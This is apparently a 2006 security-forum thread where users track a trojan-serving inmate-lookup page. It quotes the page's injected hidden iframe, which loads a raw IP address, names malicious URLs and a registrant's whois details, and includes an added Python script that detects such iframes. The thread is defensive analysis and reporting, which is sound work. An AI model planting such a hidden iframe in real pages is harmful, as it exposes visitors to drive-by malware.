Horsie.......


Galdron
August 4th, 2006, 12:01 PM
I was searching for an appropriate website to find out information on a "freaking animal" who shot and killed a dear friend of mine 16 years ago (long and sad story for her). He is (was, he has recently been released, Ugh) serving "life", and as a simple beginning I used the term "Ga. inmate query"; what came up was a large variety of results and I just began clicking them one at a time to find the correct one.

Is anyone else detecting it by clicking this link? Or am I going insane?

>>>>>WARNING THIS LINK MAY CONTAIN A TROJAN HORSE<<<<<<<

http://inmates.gidor.com/ga-prison-inmate-query.php

>>>>>WARNING THE ABOVE LINK MAY CONTAIN A TROJAN HORSE<<<<

I am showing a W32/Sober@MM!M681, which is outdated but still around.

I thought W32/Sober was an E-Mail Virii...........

Anyone else getting it?

And no I did not click on the Prn Ad.


P:

nihil
August 4th, 2006, 01:56 PM
Hmmmm!

Strange sites you frequent old chap? :D

It did not appear to do anything for me..................and I had a fair bit running...........no attempt to run a naughty script or amend the Registry............I was running 3 AVs and two anti-malwares at the time (yes, I know you don't do that............but I was at least hoping that a detection would provoke a crash?)

MM is a mass mailer, and that detection stuff hasn't noticed any attempt to use my e-mail, or send anything out.

What were you using that detected it?

I had:

1. AVG
2. Avast!
3. Clam
4. Win Patrol
5. WinPooch
6. Teatimer
7. SpyDefense
8. Ewido (interactive)
9. SpywareBlaster
10. RegistryProt

And they saw nothing?

No reaction from the firewall or mail protector either

:(

acidtone
August 4th, 2006, 02:02 PM
Nice find Galdron.. :)

I had my AV pick 'em up, I kept a copy in the Quarantine, and the other pair are now on a USB HDD to take a look at in the next few minutes.

can .zip 'em up and email at request.. :)

cheers
acidtone..:)

phishphreek
August 4th, 2006, 02:30 PM
nihil: You run all those apps at once?

For some reason... I could have sworn that running multiple av's and antispyware apps at the same time could cause problems? Not to mention... a huge waste of resources?

I run only avast as a limited user (using runas when I need admin) and I've never had any issues...

Strange sites you frequent old chap?

If you need *that* much protection... I'd think that the sites you frequent may be a bit strange?

Anyway, I visited that site with firefox 1.5.0.6 with adblock and noscript along with avast running. No warnings on my side. (I didn't enable the ads or scripting.)

ByTeWrangler
August 4th, 2006, 02:38 PM
Greetings

I don't run multiple AVs (in fact I've never installed multiple AVs) but somehow my anti-virus (updated) doesn't pick up anything either??? What's wrong here??

I disabled Noscript in Firefox but still no virus was picked up ??

nihil
August 4th, 2006, 03:11 PM
Hey Phish~ I have them all sitting on this box, I just activated them all (one at a time and slowly so as to avoid a crash) then visited the site :D like I said I was expecting any sort of detection to trigger a crash............ it can sometimes work with one that none of them can individually identify ;)

I was using FF 1.5.0.6 with script and advert blocking on.

From a previous post, this is the ByteVerify trojan....................that is about 3 years old and you should be patched against it by now? This is Win 2000 SP4, and may not be susceptible anyway? IIRC it is something to do with Java and unpatched versions of the MS virtual machine?

Perhaps Galdron has one of those proactive/aggressive AV's that scanned the page, rather than waiting for something to attack the home machine?

The MM worm would certainly seem to be a false positive, or misidentification?

Galdron
August 4th, 2006, 07:27 PM
The worm was picked up by McAfee in a split second as soon as I clicked on the link to the page. I then attempted to quarantine it, and it would not allow me to do so. I grabbed the "Stinger" from mcafee.com and took care of it.

I am in the process of contacting the website host to give them the heads up.




:cool:

muert0
August 5th, 2006, 02:01 AM
Were you using firefox or IE?

nihil
August 5th, 2006, 12:35 PM
Hi acidtone, can you submit them to these sites:

http://virusscan.jotti.org/

http://www.virustotal.com/en/indexf.html

It would be interesting to see what the major AV products make of them?

:)

Galdron
August 6th, 2006, 08:56 PM
Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=276144#post909449) by muert0
Were you using firefox or IE?


Firefox, latest version.

:)

ric-o
August 7th, 2006, 04:00 AM
FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.
<iframe width=2 height=2 style=visibility:hidden src='http://85.255.113.10/?to=GLAC&from=se-all&type=se-all'></iframe>
That site is down with a message saying the account is suspended due to violation of AUP - good.

Kinda hoped to pull down that horsie and analyze and dissect it, oh well.
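
The tag ric-o quotes has the three traits of a drive-by injection: a 2x2 frame, visibility:hidden inline CSS, and a src that is a bare IP address carrying a tracking query string (to=, from=, type=). The script below is an added example, not code posted by anyone in this thread, that parses page HTML and flags iframes with any of those traits so the indicators (host, query parameters) can be pulled out for reporting. The sample page is constructed here; only the injected iframe line is the one quoted above. The size threshold, the check names and the function names are my own assumptions.

```python
"""Flag hidden or tiny <iframe> tags and iframes whose src is a raw IP literal.

Added example for this thread (not code posted by any participant). The
sample page below is constructed; only the injected iframe is the tag quoted
from the inmate-query page. Thresholds and names are assumptions.
"""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

TINY_PX = 10  # assumption: a frame at or below this size is invisible to the user

# Constructed sample page: the injected iframe from the thread plus one
# ordinary, visible embed that must NOT be flagged.
SAMPLE_HTML = """<html><body>
<h1>GA prison inmate query</h1>
<p>Search results ...</p>
<iframe width=2 height=2 style=visibility:hidden src='http://85.255.113.10/?to=GLAC&from=se-all&type=se-all'></iframe>
<iframe width="600" height="400" src="https://example.com/embed"></iframe>
</body></html>"""


def _px(value):
    """Return an integer pixel size, or None for missing, percentage or junk values."""
    if value is None:
        return None
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value)
    return int(m.group(1)) if m else None


def _is_ip_literal(host):
    """True when the URL host is a bare IPv4/IPv6 literal rather than a hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are tiny, CSS-hidden, or sourced from a raw IP."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        # html.parser lower-cases tag and attribute names; value is None for bare attrs
        a = {k: (v or "") for k, v in attrs}
        reasons = []

        width, height = _px(a.get("width")), _px(a.get("height"))
        if (width is not None and width <= TINY_PX) or (height is not None and height <= TINY_PX):
            reasons.append(f"tiny frame ({width}x{height})")

        style = a.get("style", "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden via inline CSS")

        url = urlparse(a.get("src", ""))
        host = url.hostname or ""
        if _is_ip_literal(host):
            reasons.append(f"src host is a raw IP literal ({host})")

        if reasons:
            self.findings.append({
                "src": a.get("src", ""),
                "host": host,
                "query": parse_qs(url.query),  # tracking parameters such as to=/from=
                "reasons": reasons,
            })


def find_hidden_iframes(html):
    """Parse an HTML document and return the list of suspicious iframe findings."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_HTML):
        print(f"SUSPICIOUS iframe -> {f['src']}")
        for r in f["reasons"]:
            print(f"  - {r}")
        print(f"  query params: {f['query']}")
```

Run it against saved page source (fetch it from a throwaway VM, not your workstation); the 600x400 embed from a named host produces no finding, while the injected tag trips all three checks and the extracted host and query string are what you would hand to the hosting provider or DShield.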

Galdron
August 7th, 2006, 05:34 AM
Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=276144#post909536) by ric-o
FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.

That site is down with a message saying the account is suspended due to violation of AUP - good.

Kinda hoped to pull down that horsie and analyze and dissect it, oh well.


Still a live link, just got another (same one as before) Trojan in my Quar.

W32/Sober@MM!M681


:eek:

Eyecre8
August 7th, 2006, 03:09 PM
http ://85.255.113.10/ ?to=GLAC&from=se-all&type= se-all

One Whois lookup says its from the Ukraine.... another says its from Belarus:

Country fraud profile: High

Georgia prison wardens......Ukrainian mafioso....
Hmmm

foxyloxley
August 8th, 2006, 01:13 AM
One Whois lookup says its from the Ukraine.... another says its from Belarus:

same area of land
and Georgia is also out there too
not just in the USofA :eek:

maybe that's how you picked such a lovely site :D

and clicking the link sent AVG nuts
got two hits

those two hits have different dates on em
but I am certain I've checked the vault recently, and I haven't sent anything else there for a while

Galdron
August 8th, 2006, 02:45 AM
No response via telephone to the site host, sent a very polite e-mail, we will see if they respond. I have my doubts.

:rolleyes:

nebulus200
August 8th, 2006, 03:10 AM
Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=276144#post909604) by Galdron
No response via telephone to the site host, sent a very polite e-mail, we will see if they respond. I have my doubts.

:rolleyes:

You might try DShield/ISC/SANS's fight back...just report it to them, maybe you'll even get a mention in their daily diary ;) That's what I usually do to submit things semi-anonymously :)

acidtone
August 8th, 2006, 02:33 PM
Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=276144#post909457) by nihil
Hi acidtone, can you submit them to these sites:

http://virusscan.jotti.org/

http://www.virustotal.com/en/indexf.html

It would be interesting to see what the major AV products make of them?

:)

Nihil, I've already submitted them; I did so about 30 minutes after catching them in a contained environment.

cheers
acidtone..:)

Galdron
August 8th, 2006, 06:19 PM
Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=276144#post909605) by nebulus200
You might try DShield/ISC/SANS's fight back...just report it to them, maybe you'll even get a mention in their daily diary ;) That's what I usually do to submit things semi-anonymously :)


Done deal.

:D

Galdron
August 9th, 2006, 08:33 PM
Damnit I am obsessed!


OK so I just can't let this one go, after Zero response to both methods (telephone, and e-mail) to the host of the offending website, I am once again digging for more info.


I did report it to DShield, and they are so backed up it will take a while for them to "act", which means they will send an e-mail to the Sysadmin, and hope that action will be taken. Basically the same thing I have attempted.

Knowing that the Horsie is there, I have no fear in rooting around within the site. I noticed today that the actual Trojan originates from the following site. Apparently notorious for this activity and also registered in Russia..........good luck getting any results from these guys right?

The site you will notice serves no purpose, other than to support the Downloader/Trojan, and god knows what else.

http://proffy209.com/

Dig-

Registrant:
Boris D Gorbunov boris@bo.ca
7.49800872092
Boris D Gorbunov
Proletarskaya 3-10
Nijnoy Novgorod Nijniy Novgorod RUSSIAN FEDERATION 180092
Domain Name: proffy209.com
Record last updated at 2006-07-13 12: 42: 55
Record created on 2006/7/13
Record expired on 2007/7/13
Domain servers in listed order:
ns1.game4all.biz ns2.game4all.biz
Administrator:
name: (Boris D Gorbunov)
Email: boris@bo.ca
tel-- 7.49800872092
Boris D Gorbunov
Proletarskaya 3-10


Boris I would like to kick your Caviar eating a$$.

The virus itself is also known as TR/Dldr.Tibs.C, which copies itself to %SYSDIR%\kernels8.exe, and is a multifaceted little bugger.

Further info can be found @ link below.

http://www.avira.com/en/threats/section/fulldetails/id_vir/2246/tr_dldr.tibs.c.html


Any thoughts/Ideas/suggestions regarding these A$$hats would be great. I am on a mission.

:p